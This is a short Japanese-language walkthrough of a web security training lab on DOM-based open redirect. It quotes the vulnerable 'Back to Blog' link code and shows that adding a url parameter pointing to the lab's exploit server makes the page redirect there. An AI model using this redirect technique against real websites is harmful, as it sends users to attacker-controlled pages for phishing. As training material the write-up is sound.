Hello there, ('ω')ノ

 

DOMベースのオープンリダイレクトを。

 

ソースコードを見ると、Back to Blogのリンク処理は以下のとおりで。

urlパラメータが設定されているとそちらへ遷移するようで。

 

<a href='#'

onclick='returnUrl = /url=(https?:\/\/.+)/.exec(location);

if(returnUrl)location.href = returnUrl[1];

else location.href = "/"'

>Back to Blog</a>

 

現在のURLは以下のとおりで。

https://ac511f831f7308a68071035f005700dc.web-security-academy.net/post?postId=10

 

 

まずは、リダイレクトさせるエクスプロイトサーバのURLをコピーしておいて。

　https://acd41fda1f5b0840806b03d7012b00b2.web-security-academy.net/

 

 

現在のURLの後ろにリダイレクトするパラメータを追加して。

https://ac511f831f7308a68071035f005700dc.web-security-academy.net/post?postId=10

&url=https://acd41fda1f5b0840806b03d7012b00b2.web-security-academy.net/

 

 

 

Back to Blogをクリックすると。

 

 

エクスプロイトサーバへリダイレクトされた。

 

 

Best regards, (^^ゞ